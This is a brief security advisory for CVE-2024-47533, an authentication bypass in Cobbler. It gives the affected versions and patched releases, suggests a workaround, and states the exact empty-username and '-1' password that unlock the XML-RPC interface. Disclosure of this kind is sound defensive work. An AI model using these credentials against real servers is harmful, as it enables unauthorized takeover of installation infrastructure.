CVE-2024-47533

Name of the Vulnerable Software and Affected Versions Cobbler versions 3.0.0 through 3.2.2 Cobbler versions 3.3.0 through 3.3.6

Description The issue is related to an improper authentication vulnerability in Cobbler, a Linux installation server. This vulnerability allows anyone with network access to a Cobbler server to gain full control of the server. The utils.get shared secret() function always returns -1, which enables unauthorized access to the Cobbler XML-RPC as user `` with password -1. This gives an attacker the ability to make any changes to the server.

Recommendations For Cobbler versions 3.0.0 through 3.2.2, update to version 3.2.3 or later. For Cobbler versions 3.3.0 through 3.3.6, update to version 3.3.7 or later. As a temporary workaround, consider restricting access to the Cobbler XML-RPC endpoint to minimize the risk of exploitation.